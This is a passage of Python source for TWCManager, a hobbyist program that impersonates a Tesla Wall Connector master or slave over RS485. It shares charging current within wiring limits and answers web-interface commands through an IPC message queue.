self.masterHeartbeatData = bytearray([(0x09 if self.protocolVersion == 2 else 0x05),
(desiredHundredthsOfAmps >> 8) & 0xFF,
desiredHundredthsOfAmps & 0xFF,
0x00,0x00,0x00,0x00,0x00,0x00])
else:
self.masterHeartbeatData = bytearray([0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00])
if(len(overrideMasterHeartbeatData) >= 7):
self.masterHeartbeatData = overrideMasterHeartbeatData
if(debugLevel >= 1):
self.print_status(heartbeatData)
def set_last_amps_offered(self, desiredAmpsOffered):
# self.lastAmpsOffered should only be changed using this sub.
global debugLevel
if(debugLevel >= 10):
print("set_last_amps_offered(TWCID=" + hex_str(self.TWCID) +
", desiredAmpsOffered=" + str(desiredAmpsOffered) + ")")
if(desiredAmpsOffered != self.lastAmpsOffered):
oldLastAmpsOffered = self.lastAmpsOffered
self.lastAmpsOffered = desiredAmpsOffered
# Set totalAmpsAllTWCs to the total amps all TWCs are actually using
# minus amps this TWC is using, plus amps this TWC wants to use.
totalAmpsAllTWCs = total_amps_actual_all_twcs() \
- self.reportedAmpsActual + self.lastAmpsOffered
if(totalAmpsAllTWCs > wiringMaxAmpsAllTWCs):
# totalAmpsAllTWCs would exceed wiringMaxAmpsAllTWCs if we
# allowed this TWC to use desiredAmpsOffered. Instead, try
# offering as many amps as will increase total_amps_actual_all_twcs()
# up to wiringMaxAmpsAllTWCs.
self.lastAmpsOffered = int(wiringMaxAmpsAllTWCs -
(total_amps_actual_all_twcs() - self.reportedAmpsActual))
if(self.lastAmpsOffered < self.minAmpsTWCSupports):
# Always offer at least minAmpsTWCSupports amps.
# See notes in receive_slave_heartbeat() beneath
# 'if(maxAmpsToDivideAmongSlaves / numCarsCharging > minAmpsToOffer):'
self.lastAmpsOffered = self.minAmpsTWCSupports
print("WARNING: Offering slave TWC %02X%02X %.1fA instead of " \
"%.1fA to avoid overloading wiring shared by all TWCs." % (
self.TWCID[0], self.TWCID[1], self.lastAmpsOffered, desiredAmpsOffered))
if(self.lastAmpsOffered > self.wiringMaxAmps):
# We reach this case frequently in some configurations, such as
# when two 80A TWCs share a 125A line. Therefore, don't print
# an error.
self.lastAmpsOffered = self.wiringMaxAmps
if(debugLevel >= 10):
print("Offering slave TWC %02X%02X %.1fA instead of " \
"%.1fA to avoid overloading the TWC rated at %.1fA." % (
self.TWCID[0], self.TWCID[1], self.lastAmpsOffered,
desiredAmpsOffered, self.wiringMaxAmps))
if(self.lastAmpsOffered != oldLastAmpsOffered):
self.timeLastAmpsOfferedChanged = time.time()
return self.lastAmpsOffered
#
# End TWCSlave class
#
##############################
##############################
#
# Begin global vars
#
data = ''
dataLen = 0
ignoredData = bytearray()
msg = bytearray()
msgLen = 0
lastTWCResponseMsg = None
overrideMasterHeartbeatData = b''
masterTWCID = ''
slaveHeartbeatData = bytearray([0x01,0x0F,0xA0,0x0F,0xA0,0x00,0x00,0x00,0x00])
numInitMsgsToSend = 10
msgRxCount = 0
timeLastTx = 0
slaveTWCs = {}
slaveTWCRoundRobin = []
idxSlaveToSendNextHeartbeat = 0
maxAmpsToDivideAmongSlaves = 0
scheduledAmpsMax = -1
scheduledAmpsStartHour = -1
scheduledAmpsEndHour = -1
scheduledAmpsDaysBitmap = 0x7F
chargeNowAmps = 0
chargeNowTimeEnd = 0
spikeAmpsToCancel6ALimit = 16
timeLastGreenEnergyCheck = 0
hourResumeTrackGreenEnergy = -1
kWhDelivered = 119
timeLastkWhDelivered = time.time()
timeLastkWhSaved = time.time()
# __FILE__ contains the path to the running script. Replace the script name with
# TWCManagerSettings.txt. This gives us a path that will always locate
# TWCManagerSettings.txt in the same directory as the script even when pwd does
# not match the script directory.
settingsFileName = re.sub(r'/[^/]+$', r'/TWCManagerSettings.txt', __file__)
nonScheduledAmpsMax = -1
timeLastHeartbeatDebugOutput = 0
webMsgPacked = ''
webMsgMaxSize = 300
webMsgResult = 0
timeTo0Aafter06 = 0
timeToRaise2A = 0
carApiLastErrorTime = 0
carApiBearerToken = ''
carApiRefreshToken = ''
carApiTokenExpireTime = time.time()
carApiLastStartOrStopChargeTime = 0
carApiVehicles = []
# Transient errors are ones that usually disappear if we retry the car API
# command a minute or less later.
# 'vehicle unavailable:' sounds like it implies the car is out of connection
# range, but I once saw it returned by drive_state after wake_up returned
# 'online'. In that case, the car is reacahble, but drive_state failed for some
# reason. Thus we consider it a transient error.
# Error strings below need only match the start of an error response such as:
# {'response': None, 'error_description': '',
# 'error': 'operation_timedout for txid `4853e3ad74de12733f8cc957c9f60040`}'}
carApiTransientErrors = ['upstream internal error', 'operation_timedout',
'vehicle unavailable']
# Define minutes between retrying non-transient errors.
carApiErrorRetryMins = 10
homeLat = 10000
homeLon = 10000
backgroundTasksQueue = queue.Queue()
backgroundTasksCmds = {}
backgroundTasksLock = threading.Lock()
ser = None
ser = serial.Serial(rs485Adapter, baud, timeout=0)
#
# End global vars
#
##############################
##############################
#
# Begin main program
#
load_settings()
# Create a background thread to handle tasks that take too long on the main
# thread. For a primer on threads in Python, see:
# http://www.laurentluce.com/posts/python-threads-synchronization-locks-rlocks-semaphores-conditions-events-and-queues/
backgroundTasksThread = threading.Thread(target=background_tasks_thread, args = ())
backgroundTasksThread.daemon = True
backgroundTasksThread.start()
# Create an IPC (Interprocess Communication) message queue that we can
# periodically check to respond to queries from the TWCManager web interface.
#
# These messages will contain commands like "start charging at 10A" or may ask
# for information like "how many amps is the solar array putting out".
#
# The message queue is identified by a numeric key. This script and the web
# interface must both use the same key. The "ftok" function facilitates creating
# such a key based on a shared piece of information that is not likely to
# conflict with keys chosen by any other process in the system.
#
# ftok reads the inode number of the file or directory pointed to by its first
# parameter. This file or dir must already exist and the permissions on it don't
# seem to matter. The inode of a particular file or dir is fairly unique but
# doesn't change often so it makes a decent choice for a key. We use the parent
# directory of the TWCManager script.
#
# The second parameter to ftok is a single byte that adds some additional
# uniqueness and lets you create multiple queues linked to the file or dir in
# the first param. We use 'T' for Tesla.
#
# If you can't get this to work, you can also set key = <some arbitrary number>
# and in the web interface, use the same arbitrary number. While that could
# conflict with another process, it's very unlikely to.
webIPCkey = sysv_ipc.ftok(re.sub('/[^/]+$', '/', __file__), ord('T'), True)
# Use the key to create a message queue with read/write access for all users.
webIPCqueue = sysv_ipc.MessageQueue(webIPCkey, sysv_ipc.IPC_CREAT, 0o666)
if(webIPCqueue == None):
print("ERROR: Can't create Interprocess Communication message queue to communicate with web interface.")
# After the IPC message queue is created, if you type 'sudo ipcs -q' on the
# command like, you should see something like:
# ------ Message Queues --------
# key msqid owner perms used-bytes messages
# 0x5402ed16 491520 pi 666 0 0
#
# Notice that we've created the only IPC message queue in the system. Apparently
# default software on the pi doesn't use IPC or if it does, it creates and
# deletes its message queues quickly.
#
# If you want to get rid of all queues because you created extras accidentally,
# reboot or type 'sudo ipcrm -a msg'. Don't get rid of all queues if you see
# ones you didn't create or you may crash another process.
# Find more details in IPC here:
# http://www.onlamp.com/pub/a/php/2004/05/13/shared_memory.html
print("TWC Manager starting as fake %s with id %02X%02X and sign %02X" \
% ( ("Master" if fakeMaster else "Slave"), \
ord(fakeTWCID[0:1]), ord(fakeTWCID[1:2]), ord(slaveSign)))
while True:
try:
# In this area, we always send a linkready message when we first start.
# Whenever there is no data available from other TWCs to respond to,
# we'll loop back to this point to send another linkready or heartbeat
# message. By only sending our periodic messages when no incoming
# message data is available, we reduce the chance that we will start
# transmitting a message in the middle of an incoming message, which
# would corrupt both messages.
# Add a 25ms sleep to prevent pegging pi's CPU at 100%. Lower CPU means
# less power used and less waste heat.
time.sleep(0.025)
now = time.time()
if(fakeMaster == 1):
# A real master sends 5 copies of linkready1 and linkready2 whenever
# it starts up, which we do here.
# It doesn't seem to matter if we send these once per second or once
# per 100ms so I do once per 100ms to get them over with.
if(numInitMsgsToSend > 5):
send_master_linkready1()
time.sleep(0.1) # give slave time to respond
numInitMsgsToSend -= 1
elif(numInitMsgsToSend > 0):
send_master_linkready2()
time.sleep(0.1) # give slave time to respond
numInitMsgsToSend = numInitMsgsToSend - 1
else:
# After finishing the 5 startup linkready1 and linkready2
# messages, master will send a heartbeat message to every slave
# it's received a linkready message from. Do that here.
# A real master would keep sending linkready messages periodically
# as long as no slave was connected, but since real slaves send
# linkready once every 10 seconds till they're connected to a
# master, we'll just wait for that.
if(time.time() - timeLastTx >= 1.0):
# It's been about a second since our last heartbeat.
if(len(slaveTWCRoundRobin) > 0):
slaveTWC = slaveTWCRoundRobin[idxSlaveToSendNextHeartbeat]
if(time.time() - slaveTWC.timeLastRx > 26):
# A real master stops sending heartbeats to a slave
# that hasn't responded for ~26 seconds. It may
# still send the slave a heartbeat every once in
# awhile but we're just going to scratch the slave
# from our little black book and add them again if
# they ever send us a linkready.
print(time_now() + ": WARNING: We haven't heard from slave " \
"%02X%02X for over 26 seconds. " \
"Stop sending them heartbeat messages." % \
(slaveTWC.TWCID[0], slaveTWC.TWCID[1]))
delete_slave(slaveTWC.TWCID)
else:
slaveTWC.send_master_heartbeat()
idxSlaveToSendNextHeartbeat = idxSlaveToSendNextHeartbeat + 1
if(idxSlaveToSendNextHeartbeat >= len(slaveTWCRoundRobin)):
idxSlaveToSendNextHeartbeat = 0
time.sleep(0.1) # give slave time to respond
else:
# As long as a slave is running, it sends link ready messages every
# 10 seconds. They trigger any master on the network to handshake
# with the slave and the master then sends a status update from the
# slave every 1-3 seconds. Master's status updates trigger the slave
# to send back its own status update.
# As long as master has sent a status update within the last 10
# seconds, slaves don't send link ready.
# I've also verified that masters don't care if we stop sending link
# ready as long as we send status updates in response to master's
# status updates.
if(fakeMaster != 2 and time.time() - timeLastTx >= 10.0):
if(debugLevel >= 1):
print("Advertise fake slave %02X%02X with sign %02X is " \
"ready to link once per 10 seconds as long as master " \
"hasn't sent a heartbeat in the last 10 seconds." % \
(ord(fakeTWCID[0:1]), ord(fakeTWCID[1:2]), ord(slaveSign)))
send_slave_linkready()
########################################################################
# See if there's any message from the web interface.
# If the message is longer than msgMaxSize, MSG_NOERROR tells it to
# return what it can of the message and discard the rest.
# When no message is available, IPC_NOWAIT tells msgrcv to return
# msgResult = 0 and $! = 42 with description 'No message of desired
# type'.
# If there is an actual error, webMsgResult will be -1.
# On success, webMsgResult is the length of webMsgPacked.
try:
webMsgRaw = webIPCqueue.receive(False, 2)
if(len(webMsgRaw[0]) > 0):
webMsgType = webMsgRaw[1]
unpacked = struct.unpack('=LH', webMsgRaw[0][0:6])
webMsgTime = unpacked[0]
webMsgID = unpacked[1]
webMsg = webMsgRaw[0][6:len(webMsgRaw[0])]
if(debugLevel >= 1):
webMsgRedacted = webMsg
# Hide car password in web request to send password to Tesla
m = re.search(b'^(carApiEmailPassword=[^\n]+\n)', webMsg, re.MULTILINE)
if(m):
webMsgRedacted = m.group(1) + b'[HIDDEN]'
print(time_now() + ": Web query: '" + str(webMsgRedacted) + "', id " + str(webMsgID) +
", time " + str(webMsgTime) + ", type " + str(webMsgType))
webResponseMsg = ''
numPackets = 0
if(webMsg == b'getStatus'):
needCarApiBearerToken = False
if(carApiBearerToken == ''):
for i in range(0, len(slaveTWCRoundRobin)):
if(slaveTWCRoundRobin[i].protocolVersion == 2):
needCarApiBearerToken = True
webResponseMsg = (
"%.2f" % (maxAmpsToDivideAmongSlaves) +
'`' + "%.2f" % (wiringMaxAmpsAllTWCs) +
'`' + "%.2f" % (minAmpsPerTWC) +
'`' + "%.2f" % (chargeNowAmps) +
'`' + str(nonScheduledAmpsMax) +
'`' + str(scheduledAmpsMax) +
'`' + "%02d:%02d" % (int(scheduledAmpsStartHour),
int((scheduledAmpsStartHour % 1) * 60)) +
'`' + "%02d:%02d" % (int(scheduledAmpsEndHour),
int((scheduledAmpsEndHour % 1) * 60)) +
'`' + str(scheduledAmpsDaysBitmap) +
'`' + "%02d:%02d" % (int(hourResumeTrackGreenEnergy),
int((hourResumeTrackGreenEnergy % 1) * 60)) +
# Send 1 if we need an email/password entered for car api, otherwise send 0
'`' + ('1' if needCarApiBearerToken else '0') +
'`' + str(len(slaveTWCRoundRobin))
)
for i in range(0, len(slaveTWCRoundRobin)):
webResponseMsg += (
'`' + "%02X%02X" % (slaveTWCRoundRobin[i].TWCID[0],
slaveTWCRoundRobin[i].TWCID[1]) +
'~' + str(slaveTWCRoundRobin[i].maxAmps) +
'~' + "%.2f" % (slaveTWCRoundRobin[i].reportedAmpsActual) +
'~' + str(slaveTWCRoundRobin[i].lastAmpsOffered) +
'~' + str(slaveTWCRoundRobin[i].reportedState)
)
elif(webMsg[0:20] == b'setNonScheduledAmps='):
m = re.search(b'([-0-9]+)', webMsg[19:len(webMsg)])
if(m):
nonScheduledAmpsMax = int(m.group(1))
# Save nonScheduledAmpsMax to SD card so the setting
# isn't lost on power failure or script restart.
save_settings()
elif(webMsg[0:17] == b'setScheduledAmps='):
m = re.search(b'([-0-9]+)\nstartTime=([-0-9]+):([0-9]+)\nendTime=([-0-9]+):([0-9]+)\ndays=([0-9]+)', \
webMsg[17:len(webMsg)], re.MULTILINE)
if(m):
scheduledAmpsMax = int(m.group(1))
scheduledAmpsStartHour = int(m.group(2)) + (int(m.group(3)) / 60)
scheduledAmpsEndHour = int(m.group(4)) + (int(m.group(5)) / 60)
scheduledAmpsDaysBitmap = int(m.group(6))
save_settings()
elif(webMsg[0:30] == b'setResumeTrackGreenEnergyTime='):
m = re.search(b'([-0-9]+):([0-9]+)', webMsg[30:len(webMsg)], re.MULTILINE)
if(m):
hourResumeTrackGreenEnergy = int(m.group(1)) + (int(m.group(2)) / 60)
save_settings()
elif(webMsg[0:11] == b'sendTWCMsg='):
m = re.search(b'([0-9a-fA-F]+)', webMsg[11:len(webMsg)], re.MULTILINE)
if(m):
twcMsg = trim_pad(bytearray.fromhex(m.group(1).decode('ascii')),
15 if len(slaveTWCRoundRobin) == 0 \
or slaveTWCRoundRobin[0].protocolVersion == 2 else 13)
if((twcMsg[0:2] == b'\xFC\x19') or (twcMsg[0:2] == b'\xFC\x1A')):
print("\n*** ERROR: Web interface requested sending command:\n"
+ hex_str(twcMsg)
+ "\nwhich could permanently disable the TWC. Aborting.\n")
elif((twcMsg[0:2] == b'\xFB\xE8')):
print("\n*** ERROR: Web interface requested sending command:\n"
+ hex_str(twcMsg)
+ "\nwhich could crash the TWC. Aborting.\n")
else:
lastTWCResponseMsg = bytearray();
send_msg(twcMsg)
elif(webMsg == b'getLastTWCMsgResponse'):
if(lastTWCResponseMsg != None and lastTWCResponseMsg != b''):
webResponseMsg = hex_str(lastTWCResponseMsg)
else:
webResponseMsg = 'None'
elif(webMsg[0:20] == b'carApiEmailPassword='):
m = re.search(b'([^\n]+)\n([^\n]+)', webMsg[20:len(webMsg)], re.MULTILINE)
if(m):
queue_background_task({'cmd':'carApiEmailPassword',
'email':m.group(1).decode('ascii'),
'password':m.group(2).decode('ascii')})
elif(webMsg[0:23] == b'setMasterHeartbeatData='):
m = re.search(b'([0-9a-fA-F]*)', webMsg[23:len(webMsg)], re.MULTILINE)
if(m):
if(len(m.group(1)) > 0):
overrideMasterHeartbeatData = trim_pad(bytearray.fromhex(m.group(1).decode('ascii')),
9 if slaveTWCRoundRobin[0].protocolVersion == 2 else 7)
else:
overrideMasterHeartbeatData = b''
elif(webMsg == b'chargeNow'):
chargeNowAmps = wiringMaxAmpsAllTWCs
chargeNowTimeEnd = now + 60*60*24
elif(webMsg == b'chargeNowCancel'):
chargeNowAmps = 0
chargeNowTimeEnd = 0
elif(webMsg == b'dumpState'):
# dumpState commands are used for debugging. They are called
# using a web page:
# http://(Pi address)/index.php?submit=1&dumpState=1
webResponseMsg = ('time=' + str(now) + ', fakeMaster='
+ str(fakeMaster) + ', rs485Adapter=' + rs485Adapter
+ ', baud=' + str(baud)
+ ', wiringMaxAmpsAllTWCs=' + str(wiringMaxAmpsAllTWCs)
+ ', wiringMaxAmpsPerTWC=' + str(wiringMaxAmpsPerTWC)
+ ', minAmpsPerTWC=' + str(minAmpsPerTWC)
+ ', greenEnergyAmpsOffset=' + str(greenEnergyAmpsOffset)
+ ', debugLevel=' + str(debugLevel)
+ '\n')
webResponseMsg += (
'carApiStopAskingToStartCharging=' + str(carApiStopAskingToStartCharging)
+ '\ncarApiLastStartOrStopChargeTime=' + str(time.strftime("%m-%d-%y %H:%M:%S", time.localtime(carApiLastStartOrStopChargeTime)))
+ '\ncarApiLastErrorTime=' + str(time.strftime("%m-%d-%y %H:%M:%S", time.localtime(carApiLastErrorTime)))
+ '\ncarApiTokenExpireTime=' + str(time.strftime("%m-%d-%y %H:%M:%S", time.localtime(carApiTokenExpireTime)))
+ '\n'
)
for vehicle in carApiVehicles:
webResponseMsg += str(vehicle.__dict__) + '\n'
webResponseMsg += 'slaveTWCRoundRobin:\n'
for slaveTWC in slaveTWCRoundRobin:
webResponseMsg += str(slaveTWC.__dict__) + '\n'
numPackets = math.ceil(len(webResponseMsg) / 290)
elif(webMsg[0:14] == b'setDebugLevel='):
m = re.search(b'([-0-9]+)', webMsg[14:len(webMsg)], re.MULTILINE)
if(m):
debugLevel = int(m.group(1))
else:
print(time_now() + ": Unknown IPC request from web server: " + str(webMsg))
if(len(webResponseMsg) > 0):
if(debugLevel >= 5):
print(time_now() + ": Web query response: '" + webResponseMsg + "'")
try:
if(numPackets == 0):
if(len(webResponseMsg) > 290):
webResponseMsg = webResponseMsg[0:290]
webIPCqueue.send(struct.pack('=LH' + str(len(webResponseMsg)) + 's', webMsgTime, webMsgID,
webResponseMsg.encode('ascii')), block=False)
else:
# In this case, block=False prevents blocking if the message
# queue is too full for our message to fit. Instead, an
# error is returned.
msgTemp = struct.pack('=LH1s', webMsgTime, webMsgID, bytearray([numPackets]))
webIPCqueue.send(msgTemp, block=False)
for i in range(0, numPackets):
packet = webResponseMsg[i*290:i*290+290]
webIPCqueue.send(struct.pack('=LH' + str(len(packet)) + 's', webMsgTime, webMsgID,
packet.encode('ascii')), block=False)
except sysv_ipc.BusyError:
print(time_now() + ": Error: IPC queue full when trying to send response to web interface.")
except sysv_ipc.BusyError:
# No web message is waiting.
pass
except sysv_ipc.ExistentialError:
pass
########################################################################
# See if there's an incoming message on the RS485 interface.
timeMsgRxStart = time.time()
while True:
now = time.time()
dataLen = ser.inWaiting()
if(dataLen == 0):
if(msgLen == 0):
# No message data waiting and we haven't received the
# start of a new message yet. Break out of inner while
# to continue at top of outer while loop where we may
# decide to send a periodic message.
break
else:
# No message data waiting but we've received a partial
# message that we should wait to finish receiving.
if(now - timeMsgRxStart >= 2.0):
if(debugLevel >= 9):
print(time_now() + ": Msg timeout (" + hex_str(ignoredData) +
') ' + hex_str(msg[0:msgLen]))
msgLen = 0
ignoredData = bytearray()
break
time.sleep(0.025)
continue
else:
dataLen = 1
data = ser.read(dataLen)
if(dataLen != 1):
# This should never happen
print("WARNING: No data available.")
break
timeMsgRxStart = now
timeLastRx = now
if(msgLen == 0 and data[0] != 0xc0):
# We expect to find these non-c0 bytes between messages, so
# we don't print any warning at standard debug levels.
if(debugLevel >= 11):
print("Ignoring byte %02X between messages." % (data[0]))
ignoredData += data
continue
elif(msgLen > 0 and msgLen < 15 and data[0] == 0xc0):
# If you see this when the program is first started, it
# means we started listening in the middle of the TWC
# sending a message so we didn't see the whole message and
# must discard it. That's unavoidable.
# If you see this any other time, it means there was some
# corruption in what we received. It's normal for that to
# happen every once in awhile but there may be a problem
# such as incorrect termination or bias resistors on the
# rs485 wiring if you see it frequently.
if(debugLevel >= 10):
print("Found end of message before full-length message received. " \
"Discard and wait for new message.")
msg = data
msgLen = 1
continue
if(msgLen == 0):
msg = bytearray()
msg += data
msgLen += 1
# Messages are usually 17 bytes or longer and end with \xc0\xfe.
# However, when the network lacks termination and bias
# resistors, the last byte (\xfe) may be corrupted or even
# missing, and you may receive additional garbage bytes between
# messages.
#
# TWCs seem to account for corruption at the end and between
# messages by simply ignoring anything after the final \xc0 in a
# message, so we use the same tactic. If c0 happens to be within
# the corrupt noise between messages, we ignore it by starting a
# new message whenever we see a c0 before 15 or more bytes are
# received.
#
# Uncorrupted messages can be over 17 bytes long when special
# values are "escaped" as two bytes. See notes in send_msg.
#
# To prevent most noise between messages, add a 120ohm
# "termination" resistor in parallel to the D+ and D- lines.
# Also add a 680ohm "bias" resistor between the D+ line and +5V
# and a second 680ohm "bias" resistor between the D- line and
# ground. See here for more information:
# https://www.ni.com/support/serial/resinfo.htm
# http://www.ti.com/lit/an/slyt514/slyt514.pdf
# This explains what happens without "termination" resistors:
# https://e2e.ti.com/blogs_/b/analogwire/archive/2016/07/28/rs-485-basics-when-termination-is-necessary-and-how-to-do-it-properly
if(msgLen >= 16 and data[0] == 0xc0):
break
if(msgLen >= 16):
msg = unescape_msg(msg, msgLen)
# Set msgLen = 0 at start so we don't have to do it on errors below.
# len($msg) now contains the unescaped message length.
msgLen = 0
msgRxCount += 1
# When the sendTWCMsg web command is used to send a message to the
# TWC, it sets lastTWCResponseMsg = b''. When we see that here,
# set lastTWCResponseMsg to any unusual message received in response
# to the sent message. Never set lastTWCResponseMsg to a commonly
# repeated message like master or slave linkready, heartbeat, or
# voltage/kWh report.
if(lastTWCResponseMsg == b''
and msg[0:2] != b'\xFB\xE0' and msg[0:2] != b'\xFD\xE0'
and msg[0:2] != b'\xFC\xE1' and msg[0:2] != b'\xFB\xE2'
and msg[0:2] != b'\xFD\xE2' and msg[0:2] != b'\xFB\xEB'
and msg[0:2] != b'\xFD\xEB' and msg[0:2] != b'\xFD\xE0'
):
lastTWCResponseMsg = msg
if(debugLevel >= 9):
print("Rx@" + time_now() + ": (" + hex_str(ignoredData) + ') ' \
+ hex_str(msg) + "")
ignoredData = bytearray()
# After unescaping special values and removing the leading and
# trailing C0 bytes, the messages we know about are always 14 bytes
# long in original TWCs, or 16 bytes in newer TWCs (protocolVersion
# == 2).
if(len(msg) != 14 and len(msg) != 16):
print(time_now() + ": ERROR: Ignoring message of unexpected length %d: %s" % \
(len(msg), hex_str(msg)))
continue
checksumExpected = msg[len(msg) - 1]
checksum = 0
for i in range(1, len(msg) - 1):
checksum += msg[i]
if((checksum & 0xFF) != checksumExpected):
print("ERROR: Checksum %X does not match %02X. Ignoring message: %s" %
(checksum, checksumExpected, hex_str(msg)))
continue
if(fakeMaster == 1):
############################
# Pretend to be a master TWC
foundMsgMatch = False
# We end each regex message search below with \Z instead of $
# because $ will match a newline at the end of the string or the
# end of the string (even without the re.MULTILINE option), and
# sometimes our strings do end with a newline character that is
# actually the CRC byte with a value of 0A or 0D.
msgMatch = re.search(b'^\xfd\xe2(..)(.)(..)\x00\x00\x00\x00\x00\x00.+\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
# Handle linkready message from slave.
#
# We expect to see one of these before we start sending our
# own heartbeat message to slave.
# Once we start sending our heartbeat to slave once per
# second, it should no longer send these linkready messages.
# If slave doesn't hear master's heartbeat for around 10
# seconds, it sends linkready once per 10 seconds and starts
# flashing its red LED 4 times with the top green light on.
# Red LED stops flashing if we start sending heartbeat
# again.
foundMsgMatch = True
senderID = msgMatch.group(1)
sign = msgMatch.group(2)
maxAmps = ((msgMatch.group(3)[0] << 8) + msgMatch.group(3)[1]) / 100
if(debugLevel >= 1):
print(time_now() + ": %.2f amp slave TWC %02X%02X is ready to link. Sign: %s" % \
(maxAmps, senderID[0], senderID[1],
hex_str(sign)))
if(maxAmps >= 80):
# U.S. chargers need a spike to 21A to cancel a 6A
# charging limit imposed in an Oct 2017 Tesla car
# firmware update. See notes where
# spikeAmpsToCancel6ALimit is used.
spikeAmpsToCancel6ALimit = 21
else:
# EU chargers need a spike to only 16A. This value
# comes from a forum post and has not been directly
# tested.
spikeAmpsToCancel6ALimit = 16
if(senderID == fakeTWCID):
print(time_now + ": Slave TWC %02X%02X reports same TWCID as master. " \
"Slave should resolve by changing its TWCID." % \
(senderID[0], senderID[1]))
# I tested sending a linkready to a real master with the
# same TWCID as master and instead of master sending back
# its heartbeat message, it sent 5 copies of its
# linkready1 and linkready2 messages. Those messages
# will prompt a real slave to pick a new random value
# for its TWCID.
#
# We mimic that behavior by setting numInitMsgsToSend =
# 10 to make the idle code at the top of the for()
# loop send 5 copies of linkready1 and linkready2.
numInitMsgsToSend = 10
continue
# We should always get this linkready message at least once
# and generally no more than once, so this is a good
# opportunity to add the slave to our known pool of slave
# devices.
slaveTWC = new_slave(senderID, maxAmps)
if(slaveTWC.protocolVersion == 1 and slaveTWC.minAmpsTWCSupports == 6):
if(len(msg) == 14):
slaveTWC.protocolVersion = 1
slaveTWC.minAmpsTWCSupports = 5
elif(len(msg) == 16):
slaveTWC.protocolVersion = 2
slaveTWC.minAmpsTWCSupports = 6
if(debugLevel >= 1):
print(time_now() + ": Set slave TWC %02X%02X protocolVersion to %d, minAmpsTWCSupports to %d." % \
(senderID[0], senderID[1], slaveTWC.protocolVersion, slaveTWC.minAmpsTWCSupports))
# We expect maxAmps to be 80 on U.S. chargers and 32 on EU
# chargers. Either way, don't allow
# slaveTWC.wiringMaxAmps to be greater than maxAmps.
if(slaveTWC.wiringMaxAmps > maxAmps):
print("\n\n!!! DANGER DANGER !!!\nYou have set wiringMaxAmpsPerTWC to "
+ str(wiringMaxAmpsPerTWC)
+ " which is greater than the max "
+ str(maxAmps) + " amps your charger says it can handle. " \
"Please review instructions in the source code and consult an " \
"electrician if you don't know what to do.")
slaveTWC.wiringMaxAmps = maxAmps / 4
# Make sure we print one SHB message after a slave
# linkready message is received by clearing
# lastHeartbeatDebugOutput. This helps with debugging
# cases where I can't tell if we responded with a
# heartbeat or not.
slaveTWC.lastHeartbeatDebugOutput = ''
slaveTWC.timeLastRx = time.time()
slaveTWC.send_master_heartbeat()
else:
msgMatch = re.search(b'\A\xfd\xe0(..)(..)(.......+?).\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
# Handle heartbeat message from slave.
#
# These messages come in as a direct response to each
# heartbeat message from master. Slave does not send its
# heartbeat until it gets one from master first.
# A real master sends heartbeat to a slave around once per
# second, so we do the same near the top of this for()
# loop. Thus, we should receive a heartbeat reply from the
# slave around once per second as well.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
heartbeatData = msgMatch.group(3)
try:
slaveTWC = slaveTWCs[senderID]
except KeyError:
# Normally, a slave only sends us a heartbeat message if
# we send them ours first, so it's not expected we would
# hear heartbeat from a slave that's not in our list.
print(time_now() + ": ERROR: Received heartbeat message from " \
"slave %02X%02X that we've not met before." % \
(senderID[0], senderID[1]))
continue
if(fakeTWCID == receiverID):
slaveTWC.receive_slave_heartbeat(heartbeatData)
else:
# I've tried different fakeTWCID values to verify a
# slave will send our fakeTWCID back to us as
# receiverID. However, I once saw it send receiverID =
# 0000.
# I'm not sure why it sent 0000 and it only happened
# once so far, so it could have been corruption in the
# data or an unusual case.
if(debugLevel >= 1):
print(time_now() + ": WARNING: Slave TWC %02X%02X status data: " \
"%s sent to unknown TWC %02X%02X." % \
(senderID[0], senderID[1],
hex_str(heartbeatData), receiverID[0], receiverID[1]))
else:
msgMatch = re.search(b'\A\xfd\xeb(..)(..)(.+?).\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
# Handle kWh total and voltage message from slave.
#
# This message can only be generated by TWCs running newer
# firmware. I believe it's only sent as a response to a
# message from Master in this format:
# FB EB <Master TWCID> <Slave TWCID> 00 00 00 00 00 00 00 00 00
# Since we never send such a message, I don't expect a slave
# to ever send this message to us, but we handle it just in
# case.
# According to FuzzyLogic, this message has the following
# format on an EU (3-phase) TWC:
# FD EB <Slave TWCID> 00000038 00E6 00F1 00E8 00
# 00000038 (56) is the total kWh delivered to cars
# by this TWC since its construction.
# 00E6 (230) is voltage on phase A
# 00F1 (241) is voltage on phase B
# 00E8 (232) is voltage on phase C
#
# I'm guessing in world regions with two-phase power that
# this message would be four bytes shorter, but the pattern
# above will match a message of any length that starts with
# FD EB.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
data = msgMatch.group(3)
if(debugLevel >= 1):
print(time_now() + ": Slave TWC %02X%02X unexpectedly reported kWh and voltage data: %s." % \
(senderID[0], senderID[1],
hex_str(data)))
else:
msgMatch = re.search(b'\A\xfc(\xe1|\xe2)(..)(.)\x00\x00\x00\x00\x00\x00\x00\x00.+\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
foundMsgMatch = True
print(time_now() + " ERROR: TWC is set to Master mode so it can't be controlled by TWCManager. " \
"Search installation instruction PDF for 'rotary switch' and set " \
"switch so its arrow points to F on the dial.")
if(foundMsgMatch == False):
print(time_now() + ": *** UNKNOWN MESSAGE FROM SLAVE:" + hex_str(msg)
+ "\nPlease private message user CDragon at http://teslamotorsclub.com " \
"with a copy of this error.")
else:
###########################
# Pretend to be a slave TWC
foundMsgMatch = False
msgMatch = re.search(b'\A\xfc\xe1(..)(.)\x00\x00\x00\x00\x00\x00\x00\x00+?.\Z', msg, re.DOTALL)
if(msgMatch and foundMsgMatch == False):
# Handle linkready1 from master.
# See notes in send_master_linkready1() for details.
foundMsgMatch = True
senderID = msgMatch.group(1)
sign = msgMatch.group(2)
masterTWCID = senderID
# This message seems to always contain seven 00 bytes in its
# data area. If we ever get this message with non-00 data
# we'll print it as an unexpected message.
if(debugLevel >= 1):
print(time_now() + ": Master TWC %02X%02X Linkready1. Sign: %s" % \
(senderID[0], senderID[1], hex_str(sign)))
if(senderID == fakeTWCID):
master_id_conflict()
# Other than picking a new fakeTWCID if ours conflicts with
# master, it doesn't seem that a real slave will make any
# sort of direct response when sent a master's linkready1 or
# linkready2.
else:
msgMatch = re.search(b'\A\xfb\xe2(..)(.)\x00\x00\x00\x00\x00\x00\x00\x00+?.\Z', msg, re.DOTALL)
